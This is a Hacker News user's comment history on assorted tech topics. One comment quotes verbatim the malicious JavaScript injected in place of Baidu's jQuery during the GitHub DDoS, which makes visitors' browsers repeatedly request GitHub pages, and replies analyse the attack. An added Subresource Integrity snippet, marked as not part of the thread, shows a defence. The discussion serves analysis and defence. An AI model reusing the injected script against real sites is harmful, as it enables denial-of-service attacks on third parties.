Hacker News | valgaze's comments

This isn't germane to the main topic but this paper they cite about using a compiler pass to verify OS security ("Protecting Applications from Hostile Operating Systems") is pretty darn interesting: http://sva.cs.illinois.edu/pubs/VirtualGhost-ASPLOS-2014.pdf

Try it out here: https://jsfiddle.net/valgaze/wpL2La7d/

If this is in fact how things worked, what a great showstopper bug

Looks like 's' is also considered valid in this example

And so is any part of the full word (s, st, ste, stea, steam)

Similarly, like spaghetti shops, small software companies do not primarily make money because of "features." The notion that software is bought because of features is something that running a software company will quickly disabuse you of.

There's an old & cheesy (maybe true, maybe not) cliche: "Features TELL, benefits SELL"


"All current and former Army National Guard members since 2004 could be affected by this breach because files containing personal information was inadvertently transferred to a non-DoD-accredited data center by a contract employee [...]"


I may be overly cynical of US government policies and procedures, but I read this as someone tried to use AWS or similar without permission.


I'm reminded of the breach reported by Britain's National Health Service in 2014 (http://www.theguardian.com/society/2014/mar/03/nhs-england-p...), where data was uploaded to make use of Google's big-data sifting technologies in violation of NHS policy about secured storage of British citizenry PII.

The irony that the data had been uploaded to a physically secured, encrypted datacenter network from 27 DVDs in the possession of someone who could do whatever they wanted to with the contents of those DVDs without audit was not lost on me.

I don't reference this to imply it was good and proper use of the data; merely to note the difference between policy security and actual security.


That's not cynical at all, and the reason why Amazon is currently working on building DoD approved data centers (Not sure if it was in mainstream news... I saw it when I was browsing job listings)


If this library is too much muscle & you just need a serviceable animation library, check out Daniel Eden's animate.css: https://github.com/daneden/animate.css

Demo: http://daneden.github.io/animate.css/

Of course there's always the danger of "overdoing it" w/ ridiculous animations but if you can avoid that temptation it's a very handy tool.


I'm actually working on adding more subtle and understated animations to complement his library at the moment: http://gabrielmtn.github.io/reanimate/

It's a definite WIP so any thoughts / ideas / opinions are welcome: Gabrielmtn+github@gmail.com


This is an interesting payments case b/c with kiddos in the United States you need to deal with the Children's Online Privacy Act (ie the reason for the "are you 13 years or older" checkbox question)

One firm that was trying to do kid payments was Virtual Piggy (now Oink): http://www.oink.com


> the reason for the "are you 13 years or older" checkbox question

I thought all the age-of-13 stuff, specifically, was because you can't legally enter yourself into a contract when you're younger than 13. Which is to say, you can't accept EULAs or Terms of Service (or you can, but they'll have no legal force.)


It's COPPA. https://en.wikipedia.org/wiki/Children%27s_Online_Privacy_Pr...

Some people even consider COPPA to be a form of censorship. It creates such a huge legal burden on websites if they allow < 13 year olds, that most websites have to ban them, thus limiting their right to speech.


Obviously it depends on the jurisdiction, but typically minors cannot enter legally binding contracts. Some form of source:


One interesting feature I wasn't aware of is that this does not generally apply to "necessities" or employment contracts.


It seems like the big gripe with consoles is that there's a performance ceiling and the supposed benefit of a PC is that there simply is no ceiling. The game can look as rad as you want to pay for.

But consoles have something that PCs don't-- a floor. If a kiddo buys any piece of content for their xbox or whatever, the darn thing will run guaranteed and be pretty OK.

The same is definitely not true for a new piece of content on a PC.

PCs might not have a performance ceiling but they probably need a baseline floor. MAYBE these Steam Machines can help rectify it for down/middle market.


That's all true. If that was the only factor I might stick with consoles -- however, PCs have something else: A much more diverse collection of games. I'm interested in Steam machines largely because I would like to play PC games in a more Xbox-like way.

The fact that it will result in more games running on Linux is also a plus (for me).


I wouldn't want to trust 3/4 of the TSA folks I've encountered to run a cat house let alone exercise their independent judgement when it came to my safety or the safety of my friends and family getting on an airplane. While this isn't very polite, this screwup pretty clearly indicates that the TSA isn't exactly made up of "A-players."

Like most people pontificating/bitching about the TSA I of course have zero legit expertise in airport security, but I do have a bit of first hand experience at Ben Gurion airport in Israel where the threat level is generally pretty high.

The first thing you notice is that the security people always look like they are playing on game day. Unlike joe-blow TSA agent, these folks are alert, speak multiple languages, and likely get some specialized training to detect if someone is lying or was tricked/coerced into carrying a bomb.

It's weird-- the vibe is at times both more tense and also more relaxed than an American airport. The security people at Ben Gurion seem less like bureaucrats following procedures and more like smart people empowered to exercise their judgement (ex grandma isn't getting yanked out of line.)

Once you're in, you get asked some almost chit-chatty questions about what you're up to while they review your travel documents but the whole time it also feels like you're talking to an observant doctor or physician examining you for symptoms of an illness. If you "pass" their filter you're done & on your way in quite literally a minute or two (and it being Israel there's naturally some controversy about who gets selected for "extra" scrutiny and why.)

I've read that the problem in the US is that it's too big to cost-effectively implement a system like this everywhere and that's probably true. But maybe at least at the big/major airports there ought to be some equivalent specially-trained "hunters" who know their stuff.

It's a good thing that the agency head resigned because the TSA flunked a practice test instead of the real thing.


If you want to experiment with the graph try adjusting the a/b parameters here: https://www.desmos.com/calculator/3ugvl6yz4i


From the Sony pictures incident to the attack on that satirical magazine in Paris to this, it's getting pretty tiresome having to deal with authoritarian types who believe they should dictate what other people can say or access.

For those curious, see below for a write up of the malicious javascript (uses a simple ajax call & random number timer): http://insight-labs.org/?p=1682

document.write("<script src='http://libs.baidu.com/jquery/2.0.0/jquery.min.js'>\x3c/script>"); !window.jQuery && document.write("<script src='http://code.jquery.com/jquery-latest.js'>\x3c/script>");

startime = (new Date).getTime();

var count = 0;

function unixtime() { var a = new Date; return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3 }

url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"];

NUM = url_array.length;

function r_send2() { var a = unixtime() % NUM; get(url_array[a]) }

function get(a) { var b; $.ajax({ url: a, dataType: "script", timeout: 1E4, cache: !0, beforeSend: function() { requestTime = (new Date).getTime() }, complete: function() { responseTime = (new Date).getTime(); b = Math.floor(responseTime - requestTime); 3E5 > responseTime - startime && (r_send(b), count += 1) } }) }

function r_send(a) { setTimeout("r_send2()", a) } setTimeout("r_send2()", 2E3);


Loading all of jQuery seems a little bit excessive when the only thing they're using is the $.ajax function. http://youmightnotneedjquery.com/#request


It's excessive if your goal is _solely_ to execute a repeating AJAX request. But, if I'm understanding the attack correctly, this script is injected _in place of_ jQuery requested from Baidu's CDN. If you want the affected sites to appear normal, so the users whose browsers you are hijacking will contribute to the DDOS for the longest possible period, then you want to ensure that jQuery does indeed load.

The OP further clarifies why jQuery is injected _twice_: seems the injection is occurring only for 1% of requests. So it appears the code is looking to see if it has triggered the injection itself, and fires another request if needed.
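
A mitigation for the scenario described in the comment above (a CDN-hosted library replaced by a different script in transit), as an added example that is not part of the original thread: Subresource Integrity pins the expected hash of the library, so a modified body is refused by the browser. The function names and the two library bodies are constructed for illustration, and it assumes the embedding page itself is served over HTTPS so the integrity attribute cannot be stripped.

```javascript
const nodeCrypto = require("crypto");

// Value for a <script integrity="..."> attribute (sha384 is the usual choice).
function sriHash(body, algo = "sha384") {
  return algo + "-" + nodeCrypto.createHash(algo).update(body, "utf8").digest("base64");
}

// Mirrors the browser-side check: the attribute may hold several
// space-separated hashes, only the strongest algorithm present is used,
// and the body must match at least one hash of that algorithm.
function passesIntegrity(body, integrityAttr) {
  const strength = new Map([["sha256", 1], ["sha384", 2], ["sha512", 3]]);
  const entries = integrityAttr.trim().split(/\s+/)
    .map((tok) => {
      const i = tok.indexOf("-");
      if (i < 0) return { algo: "" };
      return { algo: tok.slice(0, i), b64: tok.slice(i + 1).split("?")[0] };
    })
    .filter((e) => strength.has(e.algo));
  if (entries.length === 0) return true; // no usable metadata: nothing is enforced
  const best = Math.max(...entries.map((e) => strength.get(e.algo)));
  return entries
    .filter((e) => strength.get(e.algo) === best)
    .some((e) => {
      const want = Buffer.from(e.b64, "base64");
      const got = nodeCrypto.createHash(e.algo).update(body, "utf8").digest();
      return want.length === got.length && nodeCrypto.timingSafeEqual(want, got);
    });
}

// Constructed sample bodies (placeholders, not real jQuery or the real payload).
const genuineLib = "window.lib = { version: '2.0.0' };";
const tamperedLib = genuineLib + "\nsetTimeout(function () { /* injected */ }, 2000);";

function demo() {
  const pinned = sriHash(genuineLib); // computed once, at build time, by the site owner
  return {
    genuine: passesIntegrity(genuineLib, pinned),   // library as published
    tampered: passesIntegrity(tamperedLib, pinned), // library modified in transit
  };
}

console.log(demo());
```

Browsers only apply the check to cross-origin scripts that are fetched with CORS, so the tag also needs `crossorigin="anonymous"` and the CDN must send the matching header.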


On which side are you ._.


Engineers don't care what side anybody is on, as long as the tech works.


> Engineers don't care what side anybody is on, as long as the tech works.

Good engineers do care. Don't mistake "being an engineer" with "being apathetic".



We knew the world would not be the same. A few people laughed, a few people cried, most people were silent. I remembered the line from the Hindu scripture, the Bhagavad-Gita... "Now, I am become Death, the destroyer of worlds."

Any engineer worth his salt absolutely understands the consequences of their actions on the world. Sometimes they understand a bit too late.


hey buddy


What's up pvam


He still went along with it.


> the Sony pictures incident

Most likely unrelated to North Korea and used for propagandistic purposes (including publicity for a below par movie).


